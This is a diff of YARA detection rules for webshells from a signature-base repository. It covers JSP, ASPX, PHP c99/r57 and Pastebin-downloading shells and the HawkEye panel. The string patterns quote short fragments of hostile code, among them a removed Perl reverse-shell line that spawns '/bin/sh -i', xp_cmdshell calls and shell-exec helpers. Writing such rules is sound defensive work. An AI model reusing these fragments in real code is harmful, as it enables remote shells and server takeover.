-		$s4 = "open STDIN,\\\"<&X\\\";open STDOUT,\\\">&X\\\";open STDERR,\\\">&X\\\";exec(\\\"/bin/sh -i\\\");"
+		$a1a = "private static final String[] COMMAND_INTERPRETER = {\"" ascii
+		$a1b = "cmd\", \"/C\"}; // Dos,Windows" ascii
+		$a2 = "Process ls_proc = Runtime.getRuntime().exec(comm, null, new File(dir));" ascii
+		$a3 = "ret.append(\"!!!! Process has timed out, destroyed !!!!!\");" ascii
 
 	condition:
 		all of them
 }
-rule SIGNATURE_BASE_Hytop_Devpack_Upload
+rule SIGNATURE_BASE_JSP_Jfigueiredo_APT_Webshell
 {
 	meta:
-		description = "Webshells Auto-generated - file upload.asp"
+		description = "JSP Browser used as web shell by APT groups - author: jfigueiredo"
 		author = "Florian Roth (Nextron Systems)"
-		id = "43054993-b0dd-5d2e-9890-db1f47759be5"
-		date = "2025-03-29"
+		id = "b5080e43-44e2-54fa-b03a-057dc75d14db"
+		date = "2014-12-10"
 		modified = "2025-03-29"
-		reference = "https://github.com/Neo23x0/signature-base"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/thor-webshells.yar#L8064-L8075"
+		reference = "http://ceso.googlecode.com/svn/web/bko/filemanager/Browser.jsp"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/thor-webshells.yar#L9077-L9090"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		hash = "b09852bda534627949f0259828c967de"
-		logic_hash = "312020a72a37adb0111ac6d61810c8e476be39dc6456e80e83cd6a680e8ea051"
-		score = 75
+		logic_hash = "7efaca469d09ce7ecba4ed38cb0b07d1b9fc4f45172d2ffb6f5d3259c000fdc5"
+		score = 60
 		quality = 85
 		tags = ""
-		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
 
 	strings:
-		$s0 = "<!-- PageUpload Below -->"
+		$a1 = "String fhidden = new String(Base64.encodeBase64(path.getBytes()));" ascii
+		$a2 = "<form id=\"upload\" name=\"upload\" action=\"ServFMUpload\" method=\"POST\" enctype=\"multipart/form-data\">" ascii
 
 	condition:
 		all of them
 }
-rule SIGNATURE_BASE_Passwordreminder
+rule SIGNATURE_BASE_JSP_Jfigueiredo_APT_Webshell_2
 {
 	meta:
-		description = "Webshells Auto-generated - file PasswordReminder.exe"
+		description = "JSP Browser used as web shell by APT groups - author: jfigueiredo"
 		author = "Florian Roth (Nextron Systems)"
-		id = "642033ee-4454-5913-8348-4d1579fc0bd8"
-		date = "2025-03-29"
+		id = "91575627-78c1-5ca1-8180-cc4004df88e8"
+		date = "2014-12-10"
 		modified = "2025-03-29"
-		reference = "https://github.com/Neo23x0/signature-base"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/thor-webshells.yar#L8076-L8087"
+		reference = "http://ceso.googlecode.com/svn/web/bko/filemanager/"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/thor-webshells.yar#L9092-L9107"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		hash = "ea49d754dc609e8bfa4c0f95d14ef9bf"
-		logic_hash = "f3da5381f5e352c541654d2af918ca8cea8049d137078670dd0538a4d13f676e"
-		score = 75
+		logic_hash = "f7fa5872d8eb4ba1d0b26d966d7650d70b1a10c56945d5a5340b8e1cb5d0f5f0"
+		score = 60
 		quality = 85
 		tags = ""
-		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
 
 	strings:
-		$s3 = "The encoded password is found at 0x%8.8lx and has a length of %d."
+		$a1 = "<div id=\"bkorotator\"><img alt=\"\" src=\"images/rotator/1.jpg\"></div>" ascii
+		$a2 = "$(\"#dialog\").dialog(\"destroy\");" ascii
+		$s1 = "<form id=\"form\" action=\"ServFMUpload\" method=\"post\" enctype=\"multipart/form-data\">" ascii
+		$s2 = "<input type=\"hidden\" id=\"fhidden\" name=\"fhidden\" value=\"L3BkZi8=\" />" ascii
 
 	condition:
-		all of them
+		all of ( $a* ) or all of ( $s* )
 }
-rule SIGNATURE_BASE_Pack_Injectt
+rule SIGNATURE_BASE_Webshell_Insomnia
 {
 	meta:
-		description = "Webshells Auto-generated - file InjectT.exe"
+		description = "Insomnia Webshell - file InsomniaShell.aspx"
 		author = "Florian Roth (Nextron Systems)"
-		id = "3a640c22-0cd4-5ab1-9216-c68625d7d505"
-		date = "2025-03-29"
+		id = "62ed3695-9ab8-54d4-a9d2-b6270c56ccfb"
+		date = "2014-12-09"
 		modified = "2025-03-29"
-		reference = "https://github.com/Neo23x0/signature-base"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/thor-webshells.yar#L8088-L8103"
+		reference = "http://www.darknet.org.uk/2014/12/insomniashell-asp-net-reverse-shell-bind-shell/"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/thor-webshells.yar#L9109-L9130"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		hash = "983b74ccd57f6195a0584cdfb27d55e8"
-		logic_hash = "9f66b7b429ed585888c0fb4943bb12262247b3af8d85bc67309b27752171e66a"
-		score = 75
+		hash = "e0cfb2ffaa1491aeaf7d3b4ee840f72d42919d22"
+		logic_hash = "d170c60f94092a38ba4af92283debd059eef2e4c683fd7737ffd60d1a2581d9c"
+		score = 80
 		quality = 85
 		tags = ""
 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
 
 	strings:
-		$s3 = "ail To Open Registry"
-		$s4 = "32fDssignim"
-		$s5 = "vide Internet S"
-		$s6 = "d]Software\\M"
-		$s7 = "TInject.Dll"
+		$s0 = "Response.Write(\"- Failed to create named pipe:\");" fullword ascii
+		$s1 = "Response.Output.Write(\"+ Sending {0}<br>\", command);" fullword ascii
+		$s2 = "String command = \"exec master..xp_cmdshell 'dir > \\\\\\\\127.0.0.1" ascii
+		$s3 = "Response.Write(\"- Error Getting User Info<br>\");" fullword ascii
+		$s4 = "string lpCommandLine, ref SECURITY_ATTRIBUTES lpProcessAttributes," fullword ascii
+		$s5 = "[DllImport(\"Advapi32.dll\", SetLastError = true)]" fullword ascii
+		$s9 = "username = DumpAccountSid(tokUser.User.Sid);" fullword ascii
+		$s14 = "//Response.Output.Write(\"Opened process PID: {0} : {1}<br>\", p" ascii
 
 	condition:
-		all of them
+		3 of them
 }
-rule SIGNATURE_BASE_FSO_S_Remexp_2
+rule SIGNATURE_BASE_Hawkeye_PHP_Panel : FILE
 {
 	meta:
-		description = "Webshells Auto-generated - file RemExp.asp"
+		description = "Detects HawkEye Keyloggers PHP Panel"
 		author = "Florian Roth (Nextron Systems)"
-		id = "501544d5-fe52-5933-8782-516ffe18f3ff"
-		date = "2025-03-29"
+		id = "1d185345-6684-538f-954a-45d57a618a7a"
+		date = "2014-12-14"
 		modified = "2025-03-29"
 		reference = "https://github.com/Neo23x0/signature-base"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/thor-webshells.yar#L8104-L8116"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/thor-webshells.yar#L9132-L9147"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		hash = "b69670ecdbb40012c73686cd22696eeb"
-		logic_hash = "e31e25a7c2b2e970a379a61d2dac335bd37cac48328eee9f3966ff5c77ef6f18"
-		score = 75
+		logic_hash = "e29b6df4e3aa3892b10e68218320ac76cecb5a1bbe6c48f2276014b972cbbdd8"
+		score = 60
 		quality = 85
-		tags = ""
+		tags = "FILE"
 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
 
 	strings:
-		$s2 = " Then Response.Write \""
-		$s3 = "<a href= \"<%=Request.ServerVariables(\"script_name\")%>"
+		$s0 = "$fname = $_GET['fname'];" ascii fullword
+		$s1 = "$data = $_GET['data'];" ascii fullword
+		$s2 = "unlink($fname);" ascii fullword
+		$s3 = "echo \"Success\";" fullword ascii
 
 	condition:
-		all of them
+		all of ( $s* ) and filesize < 600
 }
-rule SIGNATURE_BASE_FSO_S_C99
+rule SIGNATURE_BASE_Soaksoak_Infected_Wordpress
 {
 	meta:
-		description = "Webshells Auto-generated - file c99.php"
+		description = "Detects a SoakSoak infected Wordpress site http://goo.gl/1GzWUX"
 		author = "Florian Roth (Nextron Systems)"
-		id = "0b176370-a5ab-587a-b0e9-ef4fe5c604bd"
-		date = "2025-03-29"
+		id = "d147af65-72de-50be-9435-bef47eb4842a"
+		date = "2014-12-15"
 		modified = "2025-03-29"
-		reference = "https://github.com/Neo23x0/signature-base"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/thor-webshells.yar#L8117-L8128"
+		reference = "http://goo.gl/1GzWUX"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/thor-webshells.yar#L9149-L9164"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		hash = "5f9ba02eb081bba2b2434c603af454d0"
-		logic_hash = "de769299bbd8b895b84db757fcc037b807f7caaa624c06e9d330934a968b2381"
-		score = 75
+		logic_hash = "4cba18a0d14be2795d71a1973265a1742beda57636f64c1974001ecf70e3e91d"
+		score = 60
 		quality = 85
 		tags = ""
 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
 
 	strings:
-		$s2 = "\"txt\",\"conf\",\"bat\",\"sh\",\"js\",\"bak\",\"doc\",\"log\",\"sfc\",\"cfg\",\"htacce"
+		$s0 = "wp_enqueue_script(\"swfobject\");" ascii fullword
+		$s1 = "function FuncQueueObject()" ascii fullword
+		$s2 = "add_action(\"wp_enqueue_scripts\", 'FuncQueueObject');" ascii fullword
 
 	condition:
-		all of them
+		all of ( $s* )
 }
-rule SIGNATURE_BASE_Rknt_Zip_Folder_Rknt
+rule SIGNATURE_BASE_Pastebin_Webshell
 {
 	meta:
-		description = "Webshells Auto-generated - file RkNT.dll"
+		description = "Detects a web shell that downloads content from pastebin.com http://goo.gl/7dbyZs"
 		author = "Florian Roth (Nextron Systems)"
-		id = "a58a3b33-8096-535a-b930-2eb71347edb8"
-		date = "2025-03-29"
+		id = "256051ed-da33-52b4-8bfb-ab990648d8fb"
+		date = "2015-01-13"
 		modified = "2025-03-29"
-		reference = "https://github.com/Neo23x0/signature-base"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/thor-webshells.yar#L8129-L8146"
+		reference = "http://goo.gl/7dbyZs"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/thor-webshells.yar#L9166-L9188"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		hash = "5f97386dfde148942b7584aeb6512b85"
-		logic_hash = "59de8a40a7081ee5fbea9f413590237c1da9985f2352b32571529baf38c93ddb"
-		score = 75
+		logic_hash = "e71429e9280c37a90ee77be888ae743a86521d3632afc4eeec480b82a22a1445"
+		score = 70
 		quality = 85
 		tags = ""
 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
 
 	strings:
-		$s0 = "PathStripPathA"
-		$s1 = "`cLGet!Addr%"
-		$s2 = "$Info: This file is packed with the UPX executable packer http://upx.tsx.org $"
-		$s3 = "oQToOemBuff* <="
-		$s4 = "ionCdunAsw[Us'"
-		$s6 = "CreateProcessW: %S"
-		$s7 = "ImageDirectoryEntryToData"
+		$s0 = "file_get_contents(\"http://pastebin.com" ascii
+		$s1 = "xcurl('http://pastebin.com/download.php" ascii
+		$s2 = "xcurl('http://pastebin.com/raw.php" ascii
+		$x0 = "if($content){unlink('evex.php');" ascii
+		$x1 = "$fh2 = fopen(\"evex.php\", 'a');" ascii
+		$y0 = "file_put_contents($pth" ascii
+		$y1 = "echo \"<login_ok>" ascii
+		$y2 = "str_replace('* @package Wordpress',$temp" ascii
 
 	condition:
-		all of them
+		1 of ( $s* ) or all of ( $x* ) or all of ( $y* )
 }
-rule SIGNATURE_BASE_Dbgntboot
+rule SIGNATURE_BASE_Aspxspy2
 {
 	meta:
-		description = "Webshells Auto-generated - file dbgntboot.dll"
+		description = "Web shell - file ASPXspy2.aspx"
 		author = "Florian Roth (Nextron Systems)"
-		id = "6b9381e6-597d-5e74-a318-9931d20a9d08"
-		date = "2025-03-29"
+		id = "b68e0c98-0136-58d8-a2d6-57abccb1e942"
+		date = "2015-01-24"
 		modified = "2025-03-29"
-		reference = "https://github.com/Neo23x0/signature-base"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/thor-webshells.yar#L8147-L8159"
+		reference = "not set"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/thor-webshells.yar#L9190-L9216"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		hash = "4d87543d4d7f73c1529c9f8066b475ab"
-		logic_hash = "10f86f18aff4995928efb3c8000eca166fe37e6006de7938139cad718ff7653f"
+		hash = "5642387d92139bfe9ae11bfef6bfe0081dcea197"
+		logic_hash = "59c88f8e2542dcde4bf5123147ea2c1ca408925ca966f3f34a4692a3ba7a0935"
 		score = 75
 		quality = 85
 		tags = ""
 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
 
 	strings:
-		$s2 = "now DOS is working at mode %d,faketype %d,against %s,has worked %d minutes,by sp"
-		$s3 = "sth junk the M$ Wind0wZ retur"
+		$s0 = "string iVDT=\"-SETUSERSETUP\\r\\n-IP=0.0.0.0\\r\\n-PortNo=52521\\r\\n-User=bin" ascii
+		$s1 = "SQLExec : <asp:DropDownList runat=\"server\" ID=\"FGEy\" AutoPostBack=\"True\" O" ascii
+		$s3 = "Process[] p=Process.GetProcesses();" fullword ascii
+		$s4 = "Response.Cookies.Add(new HttpCookie(vbhLn,Password));" fullword ascii
+		$s5 = "[DllImport(\"kernel32.dll\",EntryPoint=\"GetDriveTypeA\")]" fullword ascii
+		$s6 = "<p>ConnString : <asp:TextBox id=\"MasR\" style=\"width:70%;margin:0 8px;\" CssCl" ascii
+		$s7 = "ServiceController[] kQmRu=System.ServiceProcess.ServiceController.GetServices();" fullword ascii
+		$s8 = "Copyright &copy; 2009 Bin -- <a href=\"http://www.rootkit.net.cn\" target=\"_bla" ascii
+		$s10 = "Response.AddHeader(\"Content-Disposition\",\"attachment;filename=\"+HttpUtility." ascii
+		$s11 = "nxeDR.Command+=new CommandEventHandler(this.iVk);" fullword ascii
+		$s12 = "<%@ import Namespace=\"System.ServiceProcess\"%>" fullword ascii
+		$s13 = "foreach(string innerSubKey in sk.GetSubKeyNames())" fullword ascii
+		$s17 = "Response.Redirect(\"http://www.rootkit.net.cn\");" fullword ascii
+		$s20 = "else if(Reg_Path.StartsWith(\"HKEY_USERS\"))" fullword ascii
 
 	condition:
-		all of them
+		6 of them
 }
-rule SIGNATURE_BASE_PHP_Shell
+rule SIGNATURE_BASE_Webshell_27_9_C66_C99 : FILE
 {
 	meta:
-		description = "Webshells Auto-generated - file shell.php"
+		description = "Detects Webshell - rule generated from from files 27.9.txt, c66.php, c99-shadows-mod.php, c99.php ..."
 		author = "Florian Roth (Nextron Systems)"
-		id = "08dff4db-3b1c-5702-a8c9-efaedf83c4ff"
-		date = "2025-03-29"
+		id = "4b985ae7-1ae6-5976-9e8d-0d6b5faed75b"
+		date = "2016-01-11"
 		modified = "2025-03-29"
-		reference = "https://github.com/Neo23x0/signature-base"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/thor-webshells.yar#L8160-L8172"
+		reference = "https://github.com/nikicat/web-malware-collection"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/thor-webshells.yar#L9227-L9252"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		hash = "45e8a00567f8a34ab1cccc86b4bc74b9"
-		logic_hash = "a62061b2fa851f5798158198e26f188408f3f37dca69a85ca155777c0b8407ee"
-		score = 75
+		logic_hash = "71ae0a3843151a2eec913f62167b23cf9e0c759b18ebe0759174d3503fb23717"
+		score = 70
 		quality = 85
-		tags = ""
+		tags = "FILE"
 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
+		hash1 = "2b8aed49f50acd0c1b89a399647e1218f2a8545da96631ac0882da28810eecc4"
+		hash2 = "5d7709a33879d1060a6cff5bae119de7d5a3c17f65415822fd125af56696778c"
+		hash3 = "c377f9316a4c953602879eb8af1fd7cbb0dd35de6bb4747fa911234082c45596"
+		hash4 = "80ec7831ae888d5603ed28d81225ed8b256c831077bb8feb235e0a1a9b68b748"
+		hash5 = "6ce99e07aa98ba6dc521c34cf16fbd89654d0ba59194878dffca857a4c34e57b"
+		hash6 = "383d771b55bbe5343bab946fd7650fd42de1933c4c8f32449d9a40c898444ef1"
+		hash7 = "07f9ec716fb199e00a90091ffba4c2ee1a328a093a64e610e51ab9dd6d33357a"
+		hash8 = "615e768522447558970c725909e064558f33d38e6402c63c92a1a8bc62b64966"
+		hash9 = "ef3a7cd233a880fc61efc3884f127dd8944808babd1203be2400144119b6057f"
+		hash10 = "a4db77895228f02ea17ff48976e03100ddfaef7c9f48c1d40462872f103451d5"
 
 	strings:
-		$s0 = "AR8iROET6mMnrqTpC6W1Kp/DsTgxNby9H1xhiswfwgoAtED0y6wEXTihoAtICkIX6L1+vTUYWuWz"
-		$s11 = "1HLp1qnlCyl5gko8rDlWHqf8/JoPKvGwEm9Q4nVKvEh0b0PKle3zeFiJNyjxOiVepMSpflJkPv5s"
+		$s4 = "if (!empty($unset_surl)) {setcookie(\"c99sh_surl\"); $surl = \"\";}" fullword ascii
+		$s6 = "@extract($_REQUEST[\"c99shcook\"]);" fullword ascii
+		$s7 = "if (!function_exists(\"c99_buff_prepare\"))" fullword ascii
 
 	condition:
-		all of them
+		filesize < 685KB and 1 of them
 }
-rule SIGNATURE_BASE_Hxdef100
+rule SIGNATURE_BASE_Webshell_Acid_Antisecshell_3 : FILE
 {
 	meta:
-		description = "Webshells Auto-generated - file hxdef100.exe"
+		description = "Detects Webshell Acid"
 		author = "Florian Roth (Nextron Systems)"
-		id = "fb376c18-02d2-5866-a0e2-ccb5262091dd"
-		date = "2025-03-29"
+		id = "68d59f1e-ef35-586b-805d-1e6e3548d092"
+		date = "2016-01-11"
 		modified = "2025-03-29"
-		reference = "https://github.com/Neo23x0/signature-base"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/thor-webshells.yar#L8173-L8186"
+		reference = "https://github.com/nikicat/web-malware-collection"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/thor-webshells.yar#L9254-L9286"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		hash = "55cc1769cef44910bd91b7b73dee1f6c"
-		logic_hash = "a2002dcddad7ffdbe9614723163016f9357347bb704640d3933ce4513c37d474"
-		score = 75
+		logic_hash = "c8c3fcde7afdafe8ead59e24e432fdd4ccae99f96f67b4be3e5a9cd74ff9b2e7"
+		score = 70
 		quality = 85
-		tags = ""
+		tags = "FILE"
 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
+		hash1 = "2b8aed49f50acd0c1b89a399647e1218f2a8545da96631ac0882da28810eecc4"
+		hash2 = "7a69466dbd18182ce7da5d9d1a9447228dcebd365e0fe855d0e02024f4117549"
+		hash3 = "0202f72b3e8b62e5ebc99164c7d4eb8ec5be6a7527286e9059184aa8321e0092"
+		hash4 = "d4424c61fe29d2ee3d8503f7d65feb48341ac2fc0049119f83074950e41194d5"
+		hash5 = "5d7709a33879d1060a6cff5bae119de7d5a3c17f65415822fd125af56696778c"
+		hash6 = "21dd06ec423f0b49732e4289222864dcc055967922d0fcec901d38a57ed77f06"
+		hash7 = "c377f9316a4c953602879eb8af1fd7cbb0dd35de6bb4747fa911234082c45596"
+		hash8 = "816e699014be9a6d02d5d184eb958c49469d687b7c6fb88e878bca64688a19c9"
+		hash9 = "383d771b55bbe5343bab946fd7650fd42de1933c4c8f32449d9a40c898444ef1"
+		hash10 = "07f9ec716fb199e00a90091ffba4c2ee1a328a093a64e610e51ab9dd6d33357a"
+		hash11 = "615e768522447558970c725909e064558f33d38e6402c63c92a1a8bc62b64966"
+		hash12 = "bbe0f7278041cb3a6338844aa12c3df6b700a12a78b0a58bce3dce14f1c37b96"
+		hash13 = "d0edca7539ef2d30f0b3189b21a779c95b5815c1637829b5594e2601e77cb4dc"
+		hash14 = "65e7edf10ffb355bed81b7413c77d13d592f63d39e95948cdaea4ea0a376d791"
+		hash15 = "ef3a7cd233a880fc61efc3884f127dd8944808babd1203be2400144119b6057f"
+		hash16 = "ba87d26340f799e65c771ccb940081838afe318ecb20ee543f32d32db8533e7f"
+		hash17 = "a4db77895228f02ea17ff48976e03100ddfaef7c9f48c1d40462872f103451d5"
+		hash18 = "1fdf6e142135a34ae1caf1d84adf5e273b253ca46c409b2530ca06d65a55ecbd"
 
 	strings:
-		$s0 = "RtlAnsiStringToUnicodeString"
-		$s8 = "SYSTEM\\CurrentControlSet\\Control\\SafeBoot\\"
-		$s9 = "\\\\.\\mailslot\\hxdef-rk100sABCDEFGH"
+		$s0 = "echo \"<option value=delete\".($dspact == \"delete\"?\" selected\":\"\").\">Delete</option>\";" fullword ascii
+		$s1 = "if (!is_readable($o)) {return \"<font color=red>\".view_perms(fileperms($o)).\"</font>\";}" fullword ascii
+
+	condition:
+		filesize < 900KB and all of them
+}
+rule SIGNATURE_BASE_Webshell_C99_4 : FILE
+{
+	meta:
+		description = "Detects C99 Webshell"
+		author = "Florian Roth (Nextron Systems)"
+		id = "d5035906-df17-5149-92ae-51e6ec05996e"
+		date = "2016-01-11"
+		modified = "2025-03-29"
+		reference = "https://github.com/nikicat/web-malware-collection"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/thor-webshells.yar#L9288-L9319"
+		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
+		logic_hash = "fa095d8da737e24a913eeadaca2882475366bf5cf0911dd9ff44aaa04871cc0f"
+		score = 70
+		quality = 85
+		tags = "FILE"
+		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
+		hash1 = "2b8aed49f50acd0c1b89a399647e1218f2a8545da96631ac0882da28810eecc4"
+		hash2 = "0202f72b3e8b62e5ebc99164c7d4eb8ec5be6a7527286e9059184aa8321e0092"
+		hash3 = "d4424c61fe29d2ee3d8503f7d65feb48341ac2fc0049119f83074950e41194d5"
+		hash4 = "5d7709a33879d1060a6cff5bae119de7d5a3c17f65415822fd125af56696778c"
+		hash5 = "21dd06ec423f0b49732e4289222864dcc055967922d0fcec901d38a57ed77f06"
+		hash6 = "c377f9316a4c953602879eb8af1fd7cbb0dd35de6bb4747fa911234082c45596"
+		hash7 = "816e699014be9a6d02d5d184eb958c49469d687b7c6fb88e878bca64688a19c9"
+		hash8 = "383d771b55bbe5343bab946fd7650fd42de1933c4c8f32449d9a40c898444ef1"
+		hash9 = "07f9ec716fb199e00a90091ffba4c2ee1a328a093a64e610e51ab9dd6d33357a"
+		hash10 = "615e768522447558970c725909e064558f33d38e6402c63c92a1a8bc62b64966"
+		hash11 = "bbe0f7278041cb3a6338844aa12c3df6b700a12a78b0a58bce3dce14f1c37b96"
+		hash12 = "ef3a7cd233a880fc61efc3884f127dd8944808babd1203be2400144119b6057f"
+		hash13 = "a4db77895228f02ea17ff48976e03100ddfaef7c9f48c1d40462872f103451d5"
+		hash14 = "1fdf6e142135a34ae1caf1d84adf5e273b253ca46c409b2530ca06d65a55ecbd"
+
+	strings:
+		$s1 = "displaysecinfo(\"List of Attributes\",myshellexec(\"lsattr -a\"));" fullword ascii
+		$s2 = "displaysecinfo(\"RAM\",myshellexec(\"free -m\"));" fullword ascii
+		$s3 = "displaysecinfo(\"Where is perl?\",myshellexec(\"whereis perl\"));" fullword ascii
+		$s4 = "$ret = myshellexec($handler);" fullword ascii
+		$s5 = "if (posix_kill($pid,$sig)) {echo \"OK.\";}" fullword ascii
 
 	condition:
-		all of them
+		filesize < 900KB and 1 of them
 }
-rule SIGNATURE_BASE_Rdrbs100
+rule SIGNATURE_BASE_Webshell_R57Shell_2 : FILE
 {
 	meta:
-		description = "Webshells Auto-generated - file rdrbs100.exe"
+		description = "Detects Webshell R57"
 		author = "Florian Roth (Nextron Systems)"
-		id = "369e5ce0-984c-54eb-96d4-fbfb4f932ba6"
-		date = "2025-03-29"
+		id = "f2298430-1eff-5ed2-abee-3b26b36d16b7"
+		date = "2016-01-11"
 		modified = "2025-03-29"
-		reference = "https://github.com/Neo23x0/signature-base"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/thor-webshells.yar#L8187-L8199"
+		reference = "https://github.com/nikicat/web-malware-collection"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/thor-webshells.yar#L9321-L9348"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		hash = "7c752bcd6da796d80a6830c61a632bff"
-		logic_hash = "8a427ef9e0ecd0c810913203aaef43647964f33658dfdca8195fce6f0545f8f4"
-		score = 75
+		logic_hash = "2af51c3d181801b14d5dbb3107cd78cf7ab4a590b7967f231ec707b7ee03fa26"
+		score = 70
 		quality = 85
-		tags = ""
+		tags = "FILE"
 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
+		hash1 = "e46777e5f1ac1652db3ce72dd0a2475ea515b37a737fffd743126772525a47e6"
+		hash2 = "aa957ca4154b7816093d667873cf6bdaded03f820e84d8f1cd5ad75296dd5d4d"
+		hash3 = "aa957ca4154b7816093d667873cf6bdaded03f820e84d8f1cd5ad75296dd5d4d"
+		hash4 = "756b788401aad4bfd4dbafd15c382d98e3ba079390addb5b0cea7ff7f985f881"
+		hash5 = "756b788401aad4bfd4dbafd15c382d98e3ba079390addb5b0cea7ff7f985f881"
+		hash6 = "16b6ec4b80f404f4616e44d8c21978dcdad9f52c84d23ba27660ee8e00984ff2"
+		hash7 = "59105e4623433d5bf93b9e17d72a43a40a4d8ac99e4a703f1d8851ad1276cd88"
+		hash8 = "1db0549066f294f814ec14ba4e9f63d88c4460d68477e5895236173df437d2b8"
+		hash9 = "c6a5148c81411ec9200810619fa5eec6616800a4d76c988431c272bc8679254f"
+		hash10 = "c6a5148c81411ec9200810619fa5eec6616800a4d76c988431c272bc8679254f"
+		hash11 = "59ea6cf16ea06ff47cf0e6a398df2eaec4d329707b8c3201fc63cbf0b7c85519"
+		hash12 = "0e0227a0001b38fb59fc07749e80c9d298ff0e6aca126ea8f4ea68ebc9a3661f"
+		hash13 = "ef74644065925aa8d64913f5f124fe73d8d289d5f019a104bf5f56689f49ba92"
 
 	strings:
-		$s3 = "Server address must be IP in A.B.C.D format."
-		$s4 = " mapped ports in the list. Currently "
+		$s1 = "$connection = @ftp_connect($ftp_server,$ftp_port,10);" fullword ascii
+		$s2 = "echo $lang[$language.'_text98'].$suc.\"\\r\\n\";" fullword ascii
 
 	condition:
-		all of them
+		filesize < 900KB and all of them
 }
-rule SIGNATURE_BASE_Mithril_Mithril
+rule SIGNATURE_BASE_Webshell_27_9_Acid_C99_Locus7S : FILE
 {
 	meta:
-		description = "Webshells Auto-generated - file Mithril.exe"
+		description = "Detects Webshell - rule generated from from files 27.9.txt, acid.php, c99_locus7s.txt"
 		author = "Florian Roth (Nextron Systems)"
-		id = "81645f57-7d7e-5b4d-b323-744f2cde4916"
-		date = "2025-03-29"
+		id = "f5f33b64-b815-5e32-8d2e-5e455651ec5d"
+		date = "2016-01-11"
 		modified = "2025-03-29"
-		reference = "https://github.com/Neo23x0/signature-base"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/thor-webshells.yar#L8200-L8218"
+		reference = "https://github.com/nikicat/web-malware-collection"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/thor-webshells.yar#L9350-L9372"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		hash = "017191562d72ab0ca551eb89256650bd"
-		logic_hash = "5d19eb4132a0401d226c9cffc927b2838e9c69428746296b55a488d097759587"
-		score = 75
+		logic_hash = "3005c09dfcb1f2e33a09ed73e28ef889c74e1f5daf619dd272e0b9b30cdb0f94"
+		score = 70
 		quality = 85
-		tags = ""
+		tags = "FILE"
